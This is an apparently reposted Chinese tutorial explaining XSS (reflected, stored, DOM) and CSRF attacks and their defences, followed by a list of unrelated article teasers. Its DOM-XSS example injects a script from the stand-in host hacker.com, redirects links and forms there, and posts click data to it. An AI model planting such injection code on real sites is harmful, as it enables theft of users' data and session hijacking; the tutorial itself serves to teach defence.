前端网络---网络安全

「前端食堂」想进大厂必须要知道的Web安全问题 - 掘金

网络安全之xss攻击

XSS 攻击是跨站脚本攻击,是一种代码注入攻击。攻击者通过在网站注入恶意脚本,使之在用户的浏览器上运行,从而盗取用户的信息如 cookie 等。

XSS 的本质是因为网站没有对恶意代码进行过滤,与正常的代码混合在一起了,浏览器没有办法分辨哪些脚本是可信的,从而导致了恶意代码的执行。

黑客利用xss攻击可能做的事情

1、获取页面的数据,例如,dom、cookie、localStorage

2、dos攻击。发送合理请求,占用服务器资源,使用户无法访问服务器

3、破坏页面结构

4、流量劫持,将链接指向某个网站

xss攻击可以分为反射型、存储型、DOM型

反射型

恶意 JavaScript 脚本属于用户发送给网站请求中的一部分,随后网站又将这部分返回给用户,恶意脚本在页面中被执行。一般发生在前后端一体的应用中,服务端逻辑会改变最终的网页代码。

会和后段有交互

存储型

黑客将恶意 JavaScript 脚本长期保存在服务端数据库中,用户一旦访问相关页面数据,恶意脚本就会被执行。常见于搜索、微博、社区贴吧评论等。会和后段有交互

DOM型

黑客将恶意 JavaScript 脚本注入到web应用程序中,通常是指攻击者通过操作页面的DOM对象模型来改变页面的内容或行为,从而可能实施攻击。仅仅发生在前端

xss攻击的案例

反射型攻击的案例

正常发送消息:

http://www.test.com/message.php?send=Hello,World!

接收者将会接收信息并显示Hello,Word

非正常发送消息:

http://www.test.com/message.php?send=<script>alert(‘foolish!’)</script>!

接收者接收消息显示的时候将会弹出警告窗口

试想如果不是弹出弹窗而是获取你的cookie或者任何的登录标识呢?是不是就可以拿到你的信息来做一些事情呢?

存储型攻击的案例

比如用户评论功能,输入一段<script>alert(‘xss’)</script>脚本,并提交保存到服务器,由于评论具有公开性,是不是每一个进入到该网站查看评论都可以被攻击?

DOM型攻击的案例

var script = document.createElement('script');
script.src = 'http://hacker.com/malicious-code.js';
document.head.appendChild(script);
document.querySelector('a').href = 'http://hacker.com';
document.querySelector('form').action = 'http://hacker.com';
document.addEventListener('click', function(event) {// 发送数据到恶意网址var xhr = new XMLHttpRequest();xhr.open('POST', 'http://hacker.com/log-clicks', true);xhr.send('x=' + event.clientX + '&y=' + event.clientY);
});

比如以上代码,通过操作dom,或者监听用户的点击动作,可以添加一些有害脚本

xss三种攻击类型的区别

1、反射型的攻击存在URL中

2、存储型的攻击存在数据库中

3、DOM型的攻击主要利用web端的代码漏洞,使浏览器执行恶意代码,属于js的漏洞

xss攻击防范方法

1、输入格式校验

2、过滤<script>、<iframe>等标签

3、对要渲染的内容进行编码转义

4、限制输入长度

5、对cookie设置httphttp only

网络安全之csrf攻击

CSRF (Cross-site request forgery,跨站请求伪造)也被称为One Click Attack或者Session Riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。尽管听起来像跨站脚本(XSS),但它与XSS非常不同,XSS利用站点内的信任用户,而CSRF则通过伪装成受信任用户请求受信任的网站。

csrf攻击防范方法

1、尽量使用post请求

2、加入验证码

3、验证Referer

4、Anti  SCRF  Token

5、加入自定义的Header

一些请求头的设置

sec-fetch-site :表示一个请求发起的来源和目标资源来源之间的关系cross-site:跨域请求same-origin:同源请求none: 不是同源也不是跨域,请求与任意上下文无关。比如浏览器窗口中拖放一个文件sec-fetch-user: 表示一个导航请求是否由用户激活触发(如用户主动点击鼠标、键盘)。Sec-Fetch-User: ?0   否                
Sec-Fetch-User: ?1   是

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/bicheng/1765.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Unity中Socket,Tcp,Udp网络连接协议总结

Unity中Socket,Tcp,Udp网络连接协议总结

Socket连接 Socket连接介绍 这里Socket先使用Tcp协议同步连接&#xff0c;Tcp协议作为稳定协议,在消息发送前必须完成客户端连接,且客户端连接在Tcp协议中只能是一对一的,即如果有ABC三个连接,那个A连接与B连接如果相互连接,则A与C之间则无法互相通信,只能由A接受到消息时创建…
阅读更多...
spring全局异常处理类ExceptionHandler获取request入参

spring全局异常处理类ExceptionHandler获取request入参

背景 项目中需要用到的数据校验、异常捕获&#xff0c;所以会用ExceptionHandler方法&#xff0c;对Controller做统一的全局异常处理。当发生异常时&#xff0c;需要记录异常的url、入参、出参、错误信息等。但是request的inputStream已经读取过一次&#xff0c;此时拿到的req…
阅读更多...
华为是如何开经营分析会的?

华为是如何开经营分析会的?

添加图片注释&#xff0c;不超过 140 字&#xff08;可选&#xff09; 企业不可避免开各种会议&#xff0c;而其中经营分析会对于企业发展至关重要。该会议主要是对企业经营目标进行复盘&#xff0c;需要公司全体上下共同重视&#xff0c;其目的是让企业集中力量&#xff0c;解…
阅读更多...
Java | Leetcode Java题解之第35题搜索插入位置

Java | Leetcode Java题解之第35题搜索插入位置

题目&#xff1a; 题解&#xff1a; class Solution {public int searchInsert(int[] nums, int target) {int n nums.length;int left 0, right n - 1, ans n;while (left < right) {int mid ((right - left) >> 1) left;if (target < nums[mid]) {ans mi…
阅读更多...
pull获取最新代码

pull获取最新代码

Pull是Git版本控制系统中的一个操作&#xff0c;用于将远程仓库的最新更改同步到本地仓库。 在Git中&#xff0c;pull命令执行两个操作&#xff1a;fetch和merge。Fetch操作会从远程仓库下载最新的提交记录和文件&#xff0c;但不会将这些更改合并到当前分支中。而Merge操作则将…
阅读更多...
网络编程协议(JavaEE开发)

网络编程协议(JavaEE开发)

目录 一、应用协议 二、传输协议 三、网络协议 四、路由控制协议 五、TCP协议 六、http协议 一、应用协议 在Java EE开发中&#xff0c;涉及多种应用协议&#xff0c;这些协议在构建分布式应用、网络通信和数据交换等方面发挥着关键作用。以下是一些在Java EE开发中常见…
阅读更多...
根据表格该列数据的长度动态变化该列的宽度;

根据表格该列数据的长度动态变化该列的宽度;

提示:记录工作中遇到的需求及解决办法 文章目录 前言一、代码前言 在使用elementui的表格将数据展示出来时,我们想根据表格该列数据的长度动态变化该列的宽度; 1.看了一下elementui文档有一个 width 的属性,可用它来修改对应列。 2.那么我们需要拿到该列的所有数据去比较…
阅读更多...
java基础之类运行与双亲委派机制简介

java基础之类运行与双亲委派机制简介

一 类加载运行过程 通过java命令运行某个类的main函数来启动程序时&#xff0c;首先需要通过类加载器将主类加载到JVM中&#xff1b; 源码&#xff1a; package com.ddu.jvm;public class HelloWordHelper {public static void main(String[] args) {User user new User();…
阅读更多...
初识java——jdk?环境变量?及关于安装jdk的步骤

初识java——jdk?环境变量?及关于安装jdk的步骤

文章目录 JDK的安装在安装JDK时遇到的问题&#xff1a; 背景知识一 什么是jdkjdk简介jdk文件详解&#xff1a;1 bin目录&#xff1a;2 lib目录&#xff1a;3 include目录.exe文件是可执行的应用程序&#xff0c;这个我们都清楚&#xff0c;但.dll文件又是做什么的呢&#xff1f…
阅读更多...
MySQL在什么样的情况下会用不上索引,或者索引失效

MySQL在什么样的情况下会用不上索引,或者索引失效

1.不遵循最左前缀原则 当我们写一个sql语句时&#xff0c;后面会跟上查询条件&#xff0c;最左前缀原则就是在我们使用复合索引的时候查询条件会从做左到右进行匹配。只有充分的利用到联合索引的时候才会用到联合索引。 比如&#xff1a; select * from student where name …
阅读更多...
数据结构学习之路--玩转队列的内核知识(附C源码)

数据结构学习之路--玩转队列的内核知识(附C源码)

嗨嗨大家~我又来啦&#xff01;今天为大家带来的是与队列相关的知识。我们马上进入知识的海洋~ 目录 前言 一、队列 1 队列的概念 2 队列的实现 2.1 队列的定义 2.2 队列的初始化 2.3 队列的判空 2.4 入队 2.5 出队 2.6 取队头元素 2.7 取队尾元素 2.8 取…
阅读更多...
python 学习笔记(零散版)

python 学习笔记(零散版)

array&#xff08;数组&#xff09;: 是numpy里的数据类型&#xff0c;用于存放同类型的多个元素&#xff0c;可以是多维的&#xff0c;内存连续&#xff0c;可以用索引访问数组中的元素。 以下是创建不同类型array的实例&#xff1a; import numpy as np# 整数类型 arr_int…
阅读更多...
AOP 权限校验模块

AOP 权限校验模块

自定义注解 检查权限 Documented Retention(RetentionPolicy.RUNTIME) Target({ElementType.TYPE, ElementType.METHOD}) public interface CheckPower {//请求路径参数String api() default "";//api相对地址String name() default "";//权限名称String …
阅读更多...
37、Tomato(VulnHub)

37、Tomato(VulnHub)

Tomato 一、nmap 2211是ssh的端口&#xff0c;21的ftp也不是弱密码 二、web渗透 随便看看 目录爆破 /seclists/Discovery/Web-Content/common.txt /antibot_image/antibots/readme.txt 发现该站点存在反爬机制 /antibot_image/antibots/info.php 提示我们该网页存在个参数 GET&…
阅读更多...
Unity - 2D物理系统

Unity - 2D物理系统

Unity - 2D物理系统 PS&#xff1a; 通用属性放在每一章最前面&#xff0c;每个组件只介绍特殊属性&#xff1b; 1.1 2D刚体&#xff08;Rigidbody 2D&#xff09; 属性描述Body Type Dynamic&#xff08;动力学&#xff09;&#xff1a;适用于需要移动并且接受完全物理模拟的…
阅读更多...
【Flutter】序列化方案之命令行生成model

【Flutter】序列化方案之命令行生成model

目录 方案一、json_model 一行命令&#xff0c;将json文件转为Dart model类及.g.dart。安装使用 方案二、build_runner 手动写model类&#xff0c;命令行生成.g.dart序列化类安装使用 参考 方案一、json_model 一行命令&#xff0c;将json文件转为Dart model类及.g.dart。 安装…
阅读更多...
SFP、SFP+、SFP28 与 QSFP28 收发器之间的差异:兼容性和性能

SFP、SFP+、SFP28 与 QSFP28 收发器之间的差异:兼容性和性能

近年来&#xff0c;网络技术发展迅速&#xff0c;因此&#xff0c;计算专业人员面临着越来越令人困惑的术语和缩写词。 管理数据中心时必须了解的一个关键领域是收发器&#xff0c;特别是 SFP (1550nm/1310nm)、SFP (850nm) 和 QSFP28 (4x25G) 之间的差异。 这些型号在兼容性方…
阅读更多...
深入浅出 SQL 优化:全面提升查询性能的技巧

深入浅出 SQL 优化:全面提升查询性能的技巧

文章目录 前言一、表结构分析1. 索引分析2. 数据类型分析3. 思考反范式设计的适用场景与潜在风险3.1数据冗余3.2 数据一致性3.3 更新性能 4. 关注临时表的创建与使用。4.1.尽量减少临时表的使用&#xff0c;以降低系统资源的消耗。4.2 使用合适的索引和数据类型优化临时表的性能…
阅读更多...
HarmonyOS ArkUI实战开发-窗口模块(Window)

HarmonyOS ArkUI实战开发-窗口模块(Window)

窗口模块用于在同一物理屏幕上&#xff0c;提供多个应用界面显示、交互的机制。 对应用开发者而言&#xff0c;窗口模块提供了界面显示和交互能力。对于终端用户而言&#xff0c;窗口模块提供了控制应用界面的方式。对于操作系统而言&#xff0c;窗口模块提供了不同应用界面的…
阅读更多...
internet.getUserEncryptKey提示错误

internet.getUserEncryptKey提示错误

大家好,相信你看到标题的时候,你应该是遇到这样的麻烦事情,微信小游戏的官方文档的说明不够全面,所以导致开发者在开发过程中会遇到非常棘手的问题,但无奈的是官方给与的只有冷冰冰的文字,包括很多开发者在开发者平台留言自己遇到的问题,比如常见的这个:internet.getUs…
阅读更多...
最新文章

Copyright @ 2022~2023